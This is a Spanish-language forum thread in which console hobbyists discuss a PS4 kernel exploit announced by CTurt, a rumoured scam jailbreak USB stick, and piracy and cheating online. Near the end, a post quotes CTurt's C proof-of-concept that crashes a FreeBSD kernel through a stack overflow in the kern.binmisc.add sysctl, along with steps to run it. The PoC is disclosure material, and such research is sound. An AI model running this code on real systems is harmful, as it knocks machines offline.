[SCENE] CTurt anuncia kernel exploit en PS4

cuervoxx escribió:Se habla de un Usb para hacer JailBreak en Wololo, de los mismos tipos que anunciaron el metodo para compartir juegos en la Ps Vita pero me huele a Fake.

http://wololo.net/2016/01/28/is-a-ps4-j ... the-works/

Cuando he leido "Wololo" me he venido arriba, pero cuando he leido que es de los mismos que anunciaron eso de la Vita, me he venido abajo ...
cercata escribió:
cuervoxx escribió:Se habla de un Usb para hacer JailBreak en Wololo, de los mismos tipos que anunciaron el metodo para compartir juegos en la Ps Vita pero me huele a Fake.

http://wololo.net/2016/01/28/is-a-ps4-j ... the-works/

Cuando he leido "Wololo" me he venido arriba, pero cuando he leido que es de los mismos que anunciaron eso de la Vita, me he venido abajo ...


Por otra parte es bueno que se diga que ese supuesto jailbreak serviría incluso para el 3.15, así presionan en cierta medida a SONY para que continúe actualizando y, por lo tanto, creando posibles agujeros en el sistema.
Pero con el tema USB, no son muy optimistas por si es un fake o que. Bueno seguimos igual, ya mostrarán algo si es verdad.
para que queréis que la metan mano si con una raspberry pi hacéis casi lo mismo? emuladores...kodi...etc etc...ya son ganas de joder el multi de todos los juegos con esta tontería...
el_aprendiz escribió:Filtrado el kernel 1.76 en .elf

https://twitter.com/n3tw0rkgod?lang=es

XD XD XD XD XD XD

esto para que sirve=?
sirve para seguir investigando posibles fallos de codigo y ademas bastante al ser el kernel
cercata escribió: ¿ Hay algún hilo que no sea así ? :P

El foro es para discutir, si quieres resumir lo importante, para eso se hace una Wiki ;)


Desgraciadamente, la gente suele desviarse del tema y muchos hilos son así..Lo que podrias encontrar en el foro en 5 minutos, te cuesta horrores..

dark argus escribió:Enhorabuena,tu si que as echo un gran aporte al hilo.


Ya lo puse en mi post, dark argus:

Murp escribió:Este post ni añade ni aporta nada al hilo, como las otras 42 páginas


Con esto tan solo queria indicar que la gente se desvia rapidamente del hilo, ya sea informativo, ayuda o lo que sea..Lo que se puede resumir en 3 páginas, la gente lo alarga lo que quiere...

neojared escribió:Creo que ese es el problema en eol, creen que este es un sitio para discutir y nosaben o han aprendido que discutir y devatir no es lo mismo amigo


Pues eso es, que por el hilo hay de todo menos lo que tiene que haber.. (Ojo, yo no digo que el post no tenga chicha, eh?? Hay la info que tiene que haber, tan sólo reitero que nos vamos por los cerros de úbeda..)

Salu2 :)
(@dark argus: Este es otro post sin sentido que tampoco aporta nada, simplemente queria contestar a las respuestas que ha generado mi primera aparición en el post... )
Murp escribió:
cercata escribió: ¿ Hay algún hilo que no sea así ? :P

El foro es para discutir, si quieres resumir lo importante, para eso se hace una Wiki ;)


Desgraciadamente, la gente suele desviarse del tema y muchos hilos son así..Lo que podrias encontrar en el foro en 5 minutos, te cuesta horrores..

dark argus escribió:Enhorabuena,tu si que as echo un gran aporte al hilo.


Ya lo puse en mi post, dark argus:

Murp escribió:Este post ni añade ni aporta nada al hilo, como las otras 42 páginas


Con esto tan solo queria indicar que la gente se desvia rapidamente del hilo, ya sea informativo, ayuda o lo que sea..Lo que se puede resumir en 3 páginas, la gente lo alarga lo que quiere...

neojared escribió:Creo que ese es el problema en eol, creen que este es un sitio para discutir y nosaben o han aprendido que discutir y devatir no es lo mismo amigo


Pues eso es, que por el hilo hay de todo menos lo que tiene que haber.. (Ojo, yo no digo que el post no tenga chicha, eh?? Hay la info que tiene que haber, tan sólo reitero que nos vamos por los cerros de úbeda..)

Salu2 :)
(@dark argus: Este es otro post sin sentido que tampoco aporta nada, simplemente queria contestar a las respuestas que ha generado mi primera aparición en el post... )



Podeis discutir en otro sitio por favor, esto es para hablar del kernel
Miguel20 escribió:
Murp escribió:
cercata escribió: ¿ Hay algún hilo que no sea así ? :P

El foro es para discutir, si quieres resumir lo importante, para eso se hace una Wiki ;)


Desgraciadamente, la gente suele desviarse del tema y muchos hilos son así..Lo que podrias encontrar en el foro en 5 minutos, te cuesta horrores..

dark argus escribió:Enhorabuena,tu si que as echo un gran aporte al hilo.


Ya lo puse en mi post, dark argus:

Murp escribió:Este post ni añade ni aporta nada al hilo, como las otras 42 páginas


Con esto tan solo queria indicar que la gente se desvia rapidamente del hilo, ya sea informativo, ayuda o lo que sea..Lo que se puede resumir en 3 páginas, la gente lo alarga lo que quiere...

neojared escribió:Creo que ese es el problema en eol, creen que este es un sitio para discutir y nosaben o han aprendido que discutir y devatir no es lo mismo amigo


Pues eso es, que por el hilo hay de todo menos lo que tiene que haber.. (Ojo, yo no digo que el post no tenga chicha, eh?? Hay la info que tiene que haber, tan sólo reitero que nos vamos por los cerros de úbeda..)

Salu2 :)
(@dark argus: Este es otro post sin sentido que tampoco aporta nada, simplemente queria contestar a las respuestas que ha generado mi primera aparición en el post... )



Podeis discutir en otro sitio por favor, esto es para hablar del kernel


+1
chufirulo está baneado por "Crearse un clon para saltarse un baneo"
Hen rikito escribió:para que queréis que la metan mano si con una raspberry pi hacéis casi lo mismo? emuladores...kodi...etc etc...ya son ganas de joder el multi de todos los juegos con esta tontería...

¿y para que entras tu aqui si no te interesa? ¿joder los multi? ¿de que carajo hablas?
chufirulo escribió:
Hen rikito escribió:para que queréis que la metan mano si con una raspberry pi hacéis casi lo mismo? emuladores...kodi...etc etc...ya son ganas de joder el multi de todos los juegos con esta tontería...

¿y para que entras tu aqui si no te interesa? ¿joder los multi? ¿de que carajo hablas?



cuando tengas un pelin mas de educación te contesto...
chufirulo está baneado por "Crearse un clon para saltarse un baneo"
Hen rikito escribió:
chufirulo escribió:
Hen rikito escribió:para que queréis que la metan mano si con una raspberry pi hacéis casi lo mismo? emuladores...kodi...etc etc...ya son ganas de joder el multi de todos los juegos con esta tontería...

¿y para que entras tu aqui si no te interesa? ¿joder los multi? ¿de que carajo hablas?



cuando tengas un pelin mas de educación te contesto...

¿Educacion? ¿acaso te he faltado el respeto? Eres tu el que entras a un hilo de scene criticandola y troleando. Ninguna consola hoy dia con scene mantiene el online integro, al menos en la mayoria no se puede jugar online, asi que sigo diciendo lo mismo: no se de que carajo hablas.
Hen rikito escribió:para que queréis que la metan mano si con una raspberry pi hacéis casi lo mismo? emuladores...kodi...etc etc...ya son ganas de joder el multi de todos los juegos con esta tontería...

Y para que voy tener otro cacharro mas enchufado a la TV si ya tengo una PS4 ?

Y el multi no creo que se joda por tener Linux en la PS4. Y por CFW tampoco, ya que las consolas con CFW conectadas online suelen acabar baneadas.
@Hen rikito @chufirulo Hola perdón si consideran que me he entrometido, es la primera vez que participo en eol y queria ayudar a zanjar éste tema por el bien de la continuidad de éste hilo, tan solo decir bajo mi experiancia con PS3 que el Online no se pierde siempre y cuando se tenga el CFW actualizado, y al menos para evitar riesgo de baneos el SenEnabler bien configurado, de otras videoconsolas no sabria decir mas, tan solo que la Wii también la tuve pirateada y tambien funcionaba el Online. El que no quiera tener riesgos de baneos la solucion esta en no piratear la consola ni usar el online teniendola pirateada, asi de sencillo. Los que nos gusta tener nuestra consola configurada a placer y con las instalaciones que queramos hacerles lo hacemos a conciencia y bajo nuestra responsabilidad, asumiendo las consecuencias, con el tiempo en PS3 solo habia que cambiar la ID de la consola si te baneaban y listo, todo es cuestión de saber cuando es el momento oportuno de dar el paso a liberar nuestra consola y saber bajo que terreno se esta metiendo uno antes de empezar a trastear. Y por último decir que el mundo de Scene jamás afectara al mundo de la "no scene" Un saludo a todos :)
Atletaloco escribió:tan solo decir bajo mi experiancia con PS3 que el Online no se pierde siempre y cuando se tenga el CFW actualizado, y al menos para evitar riesgo de baneos el SenEnabler bien configurado

Creo que no se referían a que tu pierdas el Online, sino a que el Online se eche a perder ya que habra gente con CFW y CHETOS !!!!!
@cercata si no hablamos de linux...eso es lo de menos...si al final como se dice se encuentra un bug en el kernel las cosas están jodidas pork van a reventar una y otra vez cualquier fw y eso quieras que no trae consigo carga de backups y chetos...a mi que se pueda poner linux en la consola no me importa pero eso de la carga de backups si trae cheats pues no me hace gracia...decía lo de la rasp`berry pork veo a muchos que no actualizan y tal...¿ de verdad os sale rentable tener la consola en un FW bajo? si lo hacéis por tener un buen reproductor multimedia y emus...pues para eso tenéis la raspberry pi..chromecast...y un largo etc...asi que espero y deseo que esto se quede en fw bajos...

al otro amigo ni le contesto pork parece que he dicho algo malo o algo...

pd: @cercata como llevas lo del GIMX? ¿te llegaron ya los materiales?

PD 2: a eso me refiero a que el multi no se llene de mierda...
Hen rikito escribió:pd: @cercata como llevas lo del GIMX? ¿te llegaron ya los materiales?

Segun UPS Llegan hoy ... pero con la Beta de The Division no creo que me ponga hasta el Lunes.

Lo de no actualizar la PS4, la verdad que hay que tener moral, yo como buen friki me gustaría hacerlo, pero no puedo !!!!
cercata escribió:
Hen rikito escribió:pd: @cercata como llevas lo del GIMX? ¿te llegaron ya los materiales?

Segun UPS Llegan hoy ... pero con la Beta de The Division no creo que me ponga hasta el Lunes.

Lo de no actualizar la PS4, la verdad que hay que tener moral, yo como buen friki me gustaría hacerlo, pero no puedo !!!!


espero tu impresiones que lo mismo pido los materiales...

un saludo!
cercata escribió:
Atletaloco escribió:tan solo decir bajo mi experiancia con PS3 que el Online no se pierde siempre y cuando se tenga el CFW actualizado, y al menos para evitar riesgo de baneos el SenEnabler bien configurado

Creo que no se referían a que tu pierdas el Online, sino a que el Online se eche a perder ya que habra gente con CFW y CHETOS !!!!!



@cercata Entiendo, puede que lo malinterpretara. De todas formas el mal uso que se haga del Online no es culpa de todos los que tengan una consola liberada, sino de otras personas irresponsables que no juegan limpio.
el_aprendiz escribió:Filtrado el kernel 1.76 en .elf

https://twitter.com/n3tw0rkgod?lang=es

XD XD XD XD XD XD

Ha desaparecido! [360º] [buuuaaaa]
--
Editado por mapashito_8. Razón: Material con copyright
(mensaje borrado)
fresnillo escribió:
el_aprendiz escribió:Filtrado el kernel 1.76 en .elf

https://twitter.com/n3tw0rkgod?lang=es

XD XD XD XD XD XD

Ha desaparecido! [360º] [buuuaaaa]


Sony metiendo caña?? Los Illuminati?? Los Masones? Todo esto y mucho más esta noche en cuarto milenio...
Ahora dejándome ya de chorradas pregunto: ¿Aunque el kernel es de 1.76 vale para investigar sobre firms superiores no??
Songoku19101010 está baneado por "Troll"
Atletaloco escribió:
cercata escribió:
Atletaloco escribió:tan solo decir bajo mi experiancia con PS3 que el Online no se pierde siempre y cuando se tenga el CFW actualizado, y al menos para evitar riesgo de baneos el SenEnabler bien configurado

Creo que no se referían a que tu pierdas el Online, sino a que el Online se eche a perder ya que habra gente con CFW y CHETOS !!!!!



@cercata Entiendo, puede que lo malinterpretara. De todas formas el mal uso que se haga del Online no es culpa de todos los que tengan una consola liberada, sino de otras personas irresponsables que no juegan limpio.


Y por eso prefiero q no se pirateen.
Ahora ya todo a la mierda...
de aquí es de donde sale lo del supuesto usb:

https://twitter.com/h3ck34
Dicen que el pincho saldrá no antes del 20 de Febrero y que el CFW no lo hará hasta antes del 20 de Marzo. ¿Qué sentido tiene esto? :-? :-? :-? A mi me parece una estafa monumental. Venden un pincho "vacío" y te esperas un mes a que puedas rellenarlo.
Os imaginais que sacan 3.55 y la vuelven a liar? XD XD XD XD XD
A mi esto del pincho me canta a fake bastante. Si ni siquiera hay isos de ps4 pululando por los mares del Caribe. Recuerdo con ps3 que mucho antes de ser hackeada había un montón de isos para descargar. Luego resulto que estaban todas mal creadas y no funcionaban. Que tiempos aquellos, cuando yo era joven e ingenuo :)
RepubliKano83 escribió:A mi esto del pincho me canta a fake bastante. Si ni siquiera hay isos de ps4 pululando por los mares del Caribe. Recuerdo con ps3 que mucho antes de ser hackeada había un montón de isos para descargar. Luego resulto que estaban todas mal creadas y no funcionaban. Que tiempos aquellos, cuando yo era joven e ingenuo :)

Si buceas bien por el mar de google,algun tesoro te encuentras..

Saludos
paciencia amigos , el tema de las isos es secundario

el team rebug tambien esta en ello y esos si que pueden sacar pendrive .
otro tema es si le sale rentable sacarlo porque luego llegan los chinos y al mes le sacan uno a mitad de precio
Rufidj escribió:
RepubliKano83 escribió:A mi esto del pincho me canta a fake bastante. Si ni siquiera hay isos de ps4 pululando por los mares del Caribe. Recuerdo con ps3 que mucho antes de ser hackeada había un montón de isos para descargar. Luego resulto que estaban todas mal creadas y no funcionaban. Que tiempos aquellos, cuando yo era joven e ingenuo :)

Si buceas bien por el mar de google,algun tesoro te encuentras..

Saludos


Jajajaja. Razón tiene, me acabo de llevar unas cuantas sorpresas.
JGonz91 escribió:Dicen que el pincho saldrá no antes del 20 de Febrero y que el CFW no lo hará hasta antes del 20 de Marzo. ¿Qué sentido tiene esto? :-? :-? :-? A mi me parece una estafa monumental. Venden un pincho "vacío" y te esperas un mes a que puedas rellenarlo.



Un poco raro si que es un sin sentido
--
Editado por mapashito_8. Razón: enlaces de descarga no estan permitidos
No se si os habeis leido el link que habéis puesto de wololo http://wololo.net/2016/01/28/is-a-ps4-jailbreak-usb-device-in-the-works/

Pero basicamente dicen que es muy poco fiable toda la info sobre el "USB", como por ejemplo dicen, que se vendería en amazon el dongle. De verdad? Amazon? Habrá que seguir esperando a que realmente salga algo.
Con la nueva legislacion, dudo mucho que lo podamos comprar en España si no es de importacion.
Insisto a que lo del pincho es una estafa. Venden el USB con cualquier archivo dentro y te esperas a que saquen un supuesto CFW. Luego ponen cualquier excusa y a ver quien les denuncia. Cualquier denuncia es infundada.
mattt escribió:Con la nueva legislacion, dudo mucho que lo podamos comprar en España si no es de importacion.

Sí pero ahora mismo puedes comprar en cualquier sitio del mundo y habrá que mirar sitios fiables por la experiencia de la gente cuando vayan saliendo cosas
Ese pincho huele a timo pero de una manera que no es ni medio normal
supongo que hablara de la ps4:



.
@CTurtE Here's a PoC to get panic from the bug: https://t.co/8OncI6bFHU



/*

PoC for kernel stack overflow in sysctl handler for kern.binmisc.add:
https://bugs.freebsd.org/bugzilla/show_ ... =206761#c0

su
kldload imgact_binmisc
./x

- CTurt

*/

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/sysctl.h>
//#include <sys/imgact_binmisc.h>

#define MAXPATHLEN 1024
#define IBE_VERSION 1
#define IBE_ARG_LEN_MAX 256
#define IBE_NAME_MAX 32
#define IBE_INTERP_LEN_MAX (MAXPATHLEN + IBE_ARG_LEN_MAX)
#define IBE_MAGIC_MAX 256

typedef struct ximgact_binmisc_entry {
uint32_t xbe_version; /* Struct version(IBE_VERSION) */
uint32_t xbe_flags; /* Entry flags (IBF_*) */
uint32_t xbe_moffset; /* Magic offset in header */
uint32_t xbe_msize; /* Magic size */
uint32_t spare[3]; /* Spare fields for future use */
char xbe_name[IBE_NAME_MAX]; /* Unique interpreter name */
char xbe_interpreter[IBE_INTERP_LEN_MAX]; /* Interpreter path + args */
uint8_t xbe_magic[IBE_MAGIC_MAX]; /* Header Magic */
uint8_t xbe_mask[IBE_MAGIC_MAX]; /* Magic Mask */
} ximgact_binmisc_entry_t;

ximgact_binmisc_entry_t xbe;

int main(void) {
int result = 0;
errno = 0;

xbe.xbe_version = IBE_VERSION;
strcpy(xbe.xbe_name, "CTurt");

memset(&xbe.xbe_interpreter, 'a', IBE_INTERP_LEN_MAX);
memset(&xbe.xbe_magic, 'a', IBE_MAGIC_MAX);
memset(&xbe.xbe_mask, 'a', IBE_MAGIC_MAX);

xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0;

size_t size = sizeof(xbe);

result = sysctlbyname("kern.binmisc.add", NULL, NULL, &xbe, size);

printf("result %d\n", result);
printf("errno %d\n", errno);

return 0;
}


pd: pinta a fake pero bueno:


https://youtu.be/PvBqHO_Bl0c
Está relacionado con https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206761, pero de Cturt ya no se qué pensar.

Ha llegado a un punto que hasta que no lo vea... no me creo nada, son muchos meses siguiendo su "trabajo" y no viendo publicado nada útil.

Habrá que seguir esperando, porque Fail0verfl0w no suelta prenda de su exploit [buuuaaaa], es el único que ha demostrado sobradamente que tiene un exploit. Nos ha dejado ahí como con el Chromecast [fiu], a la espera infinita de que otro haga lo mismo que él [snif]
En estos casos se suele pedir paciencia, acabare entrando una vez por semana al foro a ver si suena la flauta...
Hola, les queria dejar por aquí el Link de la pagina de Cturt en el que escribe sobre todos lo que hace con la PS4. Pero al clicar en en el apartado para contactar con el, tiene escrito que no tiene intención de liberar nada que ayude a la violación de derechos de autor, porque lo que supongo que aunque consiga hacer jailbrake no lo liberara por la posibilidad de abrir la PS4 al mundo de la piratearia, y esa no es su intención. Ahí les dejo el Link:

http://cturt.github.io/index.html
Atletaloco escribió:Hola, les queria dejar por aquí el Link de la pagina de Cturt en el que escribe sobre todos lo que hace con la PS4. Pero al clicar en en el apartado para contactar con el, tiene escrito que no tiene intención de liberar nada que ayude a la violación de derechos de autor, porque lo que supongo que aunque consiga hacer jailbrake no lo liberara por la posibilidad de abrir la PS4 al mundo de la piratearia, y esa no es su intención. Ahí les dejo el Link:

http://cturt.github.io/index.html


Este lo que quiere hacer es vender el exploit a alguna compañía china y sacar pasta,como hacen casi todos
En la web de failoverflow esta el enlace del source code el exploit de linux en ps4... Eso no tiene nada que ver verdad?
djlogan83 escribió:En la web de failoverflow esta el enlace del source code el exploit de linux en ps4... Eso no tiene nada que ver verdad?


Pues... no, la verdad es que no. Fail0verfl0w lo que hizo fue alucinante, ha picado el port del kernel y ha hecho los drivers de ati, y lo ha publicado en github.

Demostró en público que lo tenía funcionando en una "desconocida" ps4 con algún tipo de exploit que se lanzaba desde la ayuda de ps4 (abriría una página web que contenía el exploit de webkit instalado, por lo que suponemos que requiere un firmware no superior al 1.76), pero dejó claro que no iba a publicar ningún exploit porque conocía a gente que presumía de tenerlos (creo que fué un guiño a cturt y el grupo al que se ha juntado que dice tenerlo para estas últimas versiones) y que además según él son muy fáciles de sacar por la arquitectura de la ps4.

Con el chromecast pasó algo similar con él, nos enseñó que se podía liberar, y luego nos dejó tirados porque tenías que tener una versión del firmware no superior a xyzt, y el chromecast se actualiza solo (tenías que comprarte uno en ese momento y no conectarlo nunca a internet xD).

El tío es un crack pero le molesta que nadie publique las cosas, y en el fondo lo entiendo, pero es un poco putada para los que estamos esperando [maszz].

Yo sólo con lo que ha hecho fail0verfl0w soy feliz, pero no creo que lo veamos, y eso que sigo en 1.75 con la actualización 1.76 descargada y lista para instalar si se necesitara (será que el que espera se desespera [+furioso] ).
Dios creo que voy a actualizar, líbrame de la tentación de las betas abiertas y los juegos digitales! [mamaaaaa]
masterkyo escribió:Dios creo que voy a actualizar, líbrame de la tentación de las betas abiertas y los juegos digitales! [mamaaaaa]


Hermano no! Resiste! No estas sólo en esto! Hay salida! Todos lo conseguiremos! xD
612 respuestas
19, 10, 11, 12, 13